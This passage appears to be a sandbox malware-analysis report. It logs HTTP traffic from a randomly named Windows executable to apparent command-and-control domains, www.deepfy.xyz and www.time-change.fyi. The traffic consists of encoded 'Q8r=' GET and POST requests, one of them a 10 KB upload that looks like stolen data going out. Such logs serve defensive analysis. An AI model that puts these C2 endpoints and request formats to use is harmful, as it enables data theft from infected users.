66 65 46 55 49 72 6f 61 59 51 61 51 6a 34 45 77 50 72 43 42 4a 73 73 4b 38 44 52 2f 67 67 6a 4b 6e 31 4b 6e 68 33 42 79 62 33 46 50 4c 37 59 34 5a 30 7a 61 42 79 33 43 67 69 68 61 74 45 5a 54 41 43 52 30 4e 53 4f 72 48 6e 51 5a 45 77 63 6c 63 39 44 5a 69 62 4f 49 43 35 4d 46 63 36 [TRUNCATED] Data Ascii: Q8r=zmQIpxZhDsQoqb18AAH3rJEIHdQqmR5FV+OQ8NF7I1S33SMjl5U7qTHul5Eh700LVnsXaH7KOn/4lXea/Df9XzLBbxT9Te/Bt6f6Nfk4qxRjyJQ+OXMWv1QEUADsmEAP0jSX1l488K6RRsrxHxVruOVbgdVceG1COMU96nSE9xAiTYXQeh+nLQuVbV89KoXdF91UvsdLnErfxOg2MgnrQW/rtrkDgD7OSXg6C/1SA8DJn3K2feFUIroaYQaQj4EwPrCBJssK8DR/ggjKn1Knh3Byb3FPL7Y4Z0zaBy3CgihatEZTACR0NSOrHnQZEwclc9DZibOIC5MFc6cHi+KnJa7kjSZr/CVQ1kC/HEQT1dd2/vbGbfN0fetEp+y0M3zivOya5608Y0MWiViGNN+yQcVCVYAFxlIXyyyDqfZhHqbM1ZP4INnP6oQQ/rCjVasNzPZUFv/xybffQTxzbdLUu1CAIB7qEFk09gIYMvew9Ksm76BvKeKZiGLtnPdYmVtj2fC5XTcQlDCTJ1g+KdJNbjXv/pHQ60qDA9XAtR65547U2Ap+Z1VBb1tK+tHMscMmBUbtlq61Qne1BHiM6V5LQz61OK4QKwxweYJCftbX8sxJeOZDpTcmyp4p8XOKTdSMDzg1wbZed4ltySB6xCs8okUYJd8X6j8dNx5gLmbo48ZLzYnwdpOigkUnORX/IlR/OTodzf7iZNgu4+tVL4t9H18B8BlDEVd9Y6GLKLkIpGr2mMMaz/QSvHt+Fxy87kPf0r2d9DKjOJIezVwynlw0FQHoKE/Cs3fCjPCc7PiwtNTC9aISbqh6m6wxZu7ZQY/kTtvCxvi/DlMbaRyphEGCwsv8O35SX61qPV+tNvLjTmWjgyEeJz5r13LROGxki9KFEwCbXVuJtFTu9s/TxL4w5miZEMS1xMm8AbisrhnvgKlYOHQ/vZ2m3GrhE6NiLyzDu2y+R2+C4LUQvZ/tzqE/rgEe+Tv70VBHXrPFuID6XLFD1A2O [TRUNCATED]
Nov 4, 2024 10:13:23.438755035 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 04 Nov 2024 09:13:23 GMT content-type: text/html; charset=utf-8 content-length: 1110 x-request-id: 65e8f462-883d-4da8-95ab-3160b1f030ae cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Auk32KrU/WnU7zyHbwWAQ0QNQip8gpi54EH0GDlYt8hRl9HXynbqmE8CPMqnbkJNlhnfhpooyFE5NItUl8CpSA== set-cookie: parking_session=65e8f462-883d-4da8-95ab-3160b1f030ae; expires=Mon, 04 Nov 2024 09:28:23 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 75 6b 33 32 4b 72 55 2f 57 6e 55 37 7a 79 48 62 77 57 41 51 30 51 4e 51 69 70 38 67 70 69 35 34 45 48 30 47 44 6c 59 74 38 68 52 6c 39 48 58 79 6e 62 71 6d 45 38 43 50 4d 71 6e 62 6b 4a 4e 6c 68 6e 66 68 70 6f 6f 79 46 45 35 4e 49 74 55 6c 38 43 70 53 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Auk32KrU/WnU7zyHbwWAQ0QNQip8gpi54EH0GDlYt8hRl9HXynbqmE8CPMqnbkJNlhnfhpooyFE5NItUl8CpSA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 4, 2024 10:13:23.438774109 CET	563	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjVlOGY0NjItODgzZC00ZGE4LTk1YWItMzE2MGIxZjAzMGFlIiwicGFnZV90aW1lIjoxNzMwNzExNj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50042	199.59.243.227	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:25.325371981 CET	462	OUT	GET /0zsv/?Q8r=+k4oqFxRNocWibNOARfqv4VMC58QqhlZUZKcqPt4OXzeqjQirtEo6xCQlowbpjBKI3NLMSWGXVvwuRLD6mLhdQvHcmrKXdi5xtD9EO55lWtqmLshJCc1gWo=&6trpq=anQT3n HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.deepfy.xyz Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Nov 4, 2024 10:13:26.300266027 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 04 Nov 2024 09:13:26 GMT content-type: text/html; charset=utf-8 content-length: 1438 x-request-id: b922dcf3-2491-471d-a33c-2b8e81a65714 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AKkWSBgxD2Iz8oXBz2Drwtj1aroxrEMja0JtnAm9V33pcR8o6z0uF8LLqvhoti69nLYN7yvprYdp99PJbX/4aw== set-cookie: parking_session=b922dcf3-2491-471d-a33c-2b8e81a65714; expires=Mon, 04 Nov 2024 09:28:26 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 4b 6b 57 53 42 67 78 44 32 49 7a 38 6f 58 42 7a 32 44 72 77 74 6a 31 61 72 6f 78 72 45 4d 6a 61 30 4a 74 6e 41 6d 39 56 33 33 70 63 52 38 6f 36 7a 30 75 46 38 4c 4c 71 76 68 6f 74 69 36 39 6e 4c 59 4e 37 79 76 70 72 59 64 70 39 39 50 4a 62 58 2f 34 61 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AKkWSBgxD2Iz8oXBz2Drwtj1aroxrEMja0JtnAm9V33pcR8o6z0uF8LLqvhoti69nLYN7yvprYdp99PJbX/4aw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 4, 2024 10:13:26.300355911 CET	891	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjkyMmRjZjMtMjQ5MS00NzFkLWEzM2MtMmI4ZTgxYTY1NzE0IiwicGFnZV90aW1lIjoxNzMwNzExNj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50043	217.160.0.111	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:31.497531891 CET	741	OUT	POST /tc13/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.time-change.fyi Origin: http://www.time-change.fyi Content-Length: 200 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.time-change.fyi/tc13/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 66 45 7a 7a 2f 72 74 53 77 37 64 50 6c 51 78 76 61 6f 34 44 72 41 46 50 53 77 4c 65 44 45 48 42 45 71 72 67 54 79 58 64 4b 6a 4a 35 72 72 39 51 45 31 4a 55 4b 6c 78 33 67 69 65 73 6e 41 4e 35 30 63 38 31 2b 63 41 65 46 4e 76 34 63 66 67 6f 52 72 47 6d 73 32 79 65 36 78 41 39 68 30 78 79 6c 4f 64 61 7a 38 34 61 65 48 6c 43 6d 6f 4e 4e 4e 39 6e 70 4b 45 61 42 36 4a 54 75 65 6f 64 30 36 62 74 45 6b 62 43 67 6d 52 4f 70 30 64 47 71 61 50 37 47 77 2f 64 41 4b 2b 71 59 56 52 6f 71 78 7a 6f 75 4a 6f 38 64 50 47 74 6c 42 6f 71 69 73 32 69 6a 71 46 51 45 35 73 65 63 4c 30 38 58 6d 67 3d 3d Data Ascii: Q8r=fEzz/rtSw7dPlQxvao4DrAFPSwLeDEHBEqrgTyXdKjJ5rr9QE1JUKlx3giesnAN50c81+cAeFNv4cfgoRrGms2ye6xA9h0xylOdaz84aeHlCmoNNN9npKEaB6JTueod06btEkbCgmROp0dGqaP7Gw/dAK+qYVRoqxzouJo8dPGtlBoqis2ijqFQE5secL08Xmg==
Nov 4, 2024 10:13:32.334312916 CET	779	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 04 Nov 2024 09:13:32 GMT Server: Apache X-Frame-Options: deny Content-Encoding: gzip Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED] Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq\|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9\|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZMm0>}\|)on:'RFBW+}c_0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50044	217.160.0.111	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:34.051765919 CET	761	OUT	POST /tc13/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.time-change.fyi Origin: http://www.time-change.fyi Content-Length: 220 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.time-change.fyi/tc13/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 66 45 7a 7a 2f 72 74 53 77 37 64 50 6d 77 68 76 64 4a 34 44 74 67 46 49 52 77 4c 65 4e 6b 48 46 45 71 58 67 54 7a 54 4e 4b 58 6c 35 6f 4b 4e 51 46 78 39 55 5a 56 78 33 72 43 65 31 70 67 4d 37 30 64 42 41 2b 64 73 65 46 4e 37 34 63 66 77 6f 52 34 75 70 2b 57 79 63 79 52 41 7a 2f 45 78 79 6c 4f 64 61 7a 39 63 38 65 47 4e 43 36 4a 39 4e 50 5a 54 71 48 6b 61 43 79 70 54 75 61 6f 64 34 36 62 74 71 6b 65 6a 4e 6d 58 43 70 30 63 32 71 64 65 37 46 37 2f 64 38 46 65 72 34 55 55 64 49 7a 6d 45 6b 50 4c 70 39 45 48 78 67 41 75 6e 34 39 48 44 30 34 46 30 33 6b 72 58 6f 47 33 42 65 39 67 64 69 4d 62 55 71 47 32 6a 75 6a 6b 50 4e 4d 43 38 61 59 53 63 3d Data Ascii: Q8r=fEzz/rtSw7dPmwhvdJ4DtgFIRwLeNkHFEqXgTzTNKXl5oKNQFx9UZVx3rCe1pgM70dBA+dseFN74cfwoR4up+WycyRAz/ExylOdaz9c8eGNC6J9NPZTqHkaCypTuaod46btqkejNmXCp0c2qde7F7/d8Fer4UUdIzmEkPLp9EHxgAun49HD04F03krXoG3Be9gdiMbUqG2jujkPNMC8aYSc=
Nov 4, 2024 10:13:34.922955990 CET	779	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 04 Nov 2024 09:13:34 GMT Server: Apache X-Frame-Options: deny Content-Encoding: gzip Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED] Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq\|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9\|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZMm0>}\|)on:'RFBW+}c_0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50045	217.160.0.111	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:36.595967054 CET	10843	OUT	POST /tc13/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.time-change.fyi Origin: http://www.time-change.fyi Content-Length: 10300 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.time-change.fyi/tc13/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 66 45 7a 7a 2f 72 74 53 77 37 64 50 6d 77 68 76 64 4a 34 44 74 67 46 49 52 77 4c 65 4e 6b 48 46 45 71 58 67 54 7a 54 4e 4b 57 78 35 6f 34 46 51 45 57 68 55 61 56 78 33 33 53 65 77 70 67 4d 36 30 63 70 45 2b 64 77 6b 46 4c 2f 34 65 38 6f 6f 47 35 75 70 31 57 79 63 2b 78 41 79 68 30 78 6a 6c 4f 4e 65 7a 38 73 38 65 47 4e 43 36 4c 6c 4e 47 74 6e 71 55 55 61 42 36 4a 53 76 65 6f 63 6e 36 66 42 63 6b 65 75 77 6d 6e 69 70 30 38 6d 71 59 73 44 46 34 66 64 45 47 65 72 61 55 55 5a 2b 7a 69 6c 62 50 4b 73 71 45 48 56 67 43 6f 47 55 6f 6e 62 58 76 44 77 54 35 38 2b 50 48 6b 38 59 31 33 56 37 61 4a 46 79 63 57 66 63 6d 6d 57 64 64 53 77 6e 46 46 64 51 47 4b 37 41 43 62 4c 4a 76 51 46 6d 6f 39 35 43 30 79 44 78 47 31 4a 42 79 78 47 34 33 5a 36 55 2b 31 76 38 6b 2f 41 63 33 30 6b 69 4e 30 50 49 44 58 33 74 45 30 63 54 6e 57 63 77 50 49 6d 6e 38 43 54 35 63 31 4c 69 45 37 76 42 47 71 30 4f 62 34 4d 76 4b 74 38 34 74 39 77 6e 76 4e 75 58 39 4b 38 74 30 64 5a 43 2f 47 47 57 62 45 56 35 62 66 6c 41 59 33 [TRUNCATED] Data Ascii: Q8r=fEzz/rtSw7dPmwhvdJ4DtgFIRwLeNkHFEqXgTzTNKWx5o4FQEWhUaVx33SewpgM60cpE+dwkFL/4e8ooG5up1Wyc+xAyh0xjlONez8s8eGNC6LlNGtnqUUaB6JSveocn6fBckeuwmnip08mqYsDF4fdEGeraUUZ+zilbPKsqEHVgCoGUonbXvDwT58+PHk8Y13V7aJFycWfcmmWddSwnFFdQGK7ACbLJvQFmo95C0yDxG1JByxG43Z6U+1v8k/Ac30kiN0PIDX3tE0cTnWcwPImn8CT5c1LiE7vBGq0Ob4MvKt84t9wnvNuX9K8t0dZC/GGWbEV5bflAY37Ud62kceM+4i67beY6SyY/PIdUO0mRPao2qjJZtygKLpjTtMXa6Rke/7wXmnk0dV/RvkaqSrNu8KXckmoDvgYPY5IH7awGwGIGNkyrECYmDHe4n3dHf5lpEJJrkuE1/JNIiu92cWFk85JFTArhwR7dc+P3x2PBFPPiDFGG07pfrdt1bF7DhSf2CdqGpAgU6em3XCir1zn8mP6S2Gjfo5k9MYj8WkBA+wyEbWLtZjp6hApgpEEwsXL0eXiSOL0hjZjETy2c8QZpitN7LB1LFZoJWgsWePlHDif/iBbaKDpr77j4hIXncFWxTP5Oz1ZWho2k/HU6L/ObfF/aNXv0l0hMA0XpYtH8DwlCcZ/HS+EZONtnLwytGU9eJCBWkYWkrBH5QnAt3tYLdlf7qGeIVSJ1YiDGlfWDSA5WRClS/om4+abKDaJXIpm2Rr5OWz8z55UbmRr7IcI1dcCaSPG0hVr0QH6A/+wrXod15+2mJROQ17DnJsWnAMccuUFwUUqlgUCx9kwHhH9lcBOPNzV0UNT9G4sUMjPxR3Hx2+o21Fj4Xy1QF3wtgi/DGJSzlI/j8UfmMCR9keSFEwBIF2rdmE+JhxnP2Tvzy+B51sQCBNWF6qELDWimKybETs/xChw1AL5e/xinlRYbpk+F4YPXjfW3CQ9L3ex/HCOd [TRUNCATED]
Nov 4, 2024 10:13:37.431473017 CET	779	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 04 Nov 2024 09:13:37 GMT Server: Apache X-Frame-Options: deny Content-Encoding: gzip Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED] Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq\|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9\|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZMm0>}\|)on:'RFBW+}c_0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50046	217.160.0.111	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:39.139338970 CET	467	OUT	GET /tc13/?Q8r=SGbT8cdGn4hr6W9IQaErgA0XZ0/ODBbeE+rRSQfNCBVGsaJUOBN6Lk8UowuO+R8+qu85kOdeeMLFTNx1Fuyr7ECi1xcpiA8ny7JQ29NqIXoz/KZuCpX8Llg=&6trpq=anQT3n HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.time-change.fyi Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Nov 4, 2024 10:13:39.985613108 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1271 Connection: close Date: Mon, 04 Nov 2024 09:13:39 GMT Server: Apache X-Frame-Options: deny Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 